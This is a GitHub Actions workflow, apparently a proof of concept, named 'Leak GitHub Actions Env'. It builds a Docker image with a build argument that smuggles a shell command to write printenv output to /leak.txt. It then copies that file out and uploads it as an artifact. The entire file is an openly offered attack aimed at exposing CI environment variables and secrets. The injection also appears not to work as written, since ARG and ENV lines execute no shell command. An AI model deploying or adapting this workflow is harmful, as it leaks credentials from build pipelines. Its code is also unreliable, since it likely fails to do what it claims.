name: Leak GitHub Actions Env

on:
  workflow_dispatch:

jobs:
  leak-env:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Build Docker image with injected PYTHON_VERSION
        run: |
          echo "FROM alpine" > Dockerfile
          echo 'RUN apk add --no-cache bash' >> Dockerfile
          echo 'ARG PYTHON_VERSION' >> Dockerfile
          echo 'ENV PYTHON_VERSION=$PYTHON_VERSION' >> Dockerfile
          docker build \
            --no-cache \
            --build-arg PYTHON_VERSION="3.11-alpine; date > /leak.txt; printenv >> /leak.txt" \
            -t leak-image .

      - name: Create container and copy leak.txt
        run: |
          docker create --name leaky leak-image
          docker cp leaky:/leak.txt ./leak.txt
          docker rm leaky

      - name: Upload leaked environment
        uses: actions/upload-artifact@v3
        with:
          name: leaked-env-${{ github.run_id }}
          path: ./leak.txt
